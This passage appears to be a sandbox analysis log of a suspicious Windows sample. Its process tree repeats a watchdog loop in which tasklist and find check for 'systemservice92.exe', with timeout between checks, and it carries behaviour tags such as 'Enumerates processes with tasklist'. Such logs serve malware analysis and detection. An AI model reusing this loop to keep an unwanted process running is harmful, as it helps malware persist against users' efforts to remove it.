      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:884
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9832
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:2372
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:3704
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:1984
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9452
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:1480
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9920
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:2420
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9524
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9904
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9936
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9940
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:1524
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:3284
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:9932
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:10004
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9784
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:3144
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:10060
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:3068
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9672
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9788
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:388
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:3084
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:696
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:10080
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5900
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5272
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5560
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:10096
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:10120
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7036
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:1656
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:4640
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:2716
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:7160
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5708
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7148
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:3948
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:3472
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:10204
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:3272
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5172
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:900
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9512
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9504
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5232
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:10176
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9576
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:2644
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9716
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9488
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:4596
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:4688
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:10220
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:2780
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9964
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:4648
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6360
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:4164
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:1568
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:2264
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7832
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6040
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9908
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:10152
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9800
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:10016
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:1428
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:10012
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:10188
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:5212
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:10036
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7976
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8232
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:1420
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5280
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:2508
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5260
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5316
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5312
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5324
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5724
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5384
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5360
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5452
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5444
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:4220
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:1976
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:4820
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:3256
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5564
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5588
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:3368
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:3104
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5616
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5772
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5664
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5808
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5592
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5840
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5940
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:3160
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:4004
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:2148
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5860
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:4748
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:4964
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:668
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:4352
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:1348
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:4216
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5640
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5960
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:4744
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:828
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:3412
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:2000
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:1920
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:2156
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5516
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:4500
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:2436
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:1496
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:2012
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:4680
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:4880
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:2004
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:1924
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:4016
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5476
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:5984
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5992
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6064
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6100
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6084
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:960
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6164
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6028
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:904
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:4896
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6180
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5244
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6168
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6248
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6204
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:6316
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6336
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6344
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6388
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6372
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6440
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6480
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6436
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6432
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6816
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6568
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6776
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6596
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6876
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6692
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6724
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6684
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6916
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6888
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6992
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:288
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:316
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:296
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6796
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6672
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6648
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7212
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:7428
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7312
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7396
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7464
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7448
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7488
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7568
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7508
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7560
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7692
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7640
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7644
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7616
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7712
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7648
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7792
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7776
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7812
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7848
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7600
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:7880
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7872
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7888
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7884
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7908
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7948
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7688
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8004
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7920
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:7984
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8104
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8036
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:8080
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8172
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8112
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8152
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8176
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8196
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5760
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8228
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8244
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8272
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8324
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8396
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:1128
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8436
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:6624
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7328
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6760
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8548
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:8468
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8596
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8628
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8668
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8664
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8504
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7228
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:1904
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:4208
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7320
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:7252
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8644
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8716
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8740
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8752
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8776
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8772
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8860
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8864
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:8920
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8924
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9016
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:8988
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8996
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7340
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:7292
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7288
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7296
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9092
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9080
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:9116
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9136
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9144
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:1152
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:2772
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:952
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:1460
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:2040
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:4776
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:4912
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:6908
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:1992
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:2804
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9320
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9344
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8576
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:2752
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9336
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9388
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      PID:9412
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9400
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5864
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9616
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9624
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9560
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9632
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:2348
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9596
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:4656
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:4064
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:4252
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8524
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7432
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9700
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9736
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:4584
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9772
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9748
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5144
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:1940
  - - C:\Windows\system32\tasklist.exe
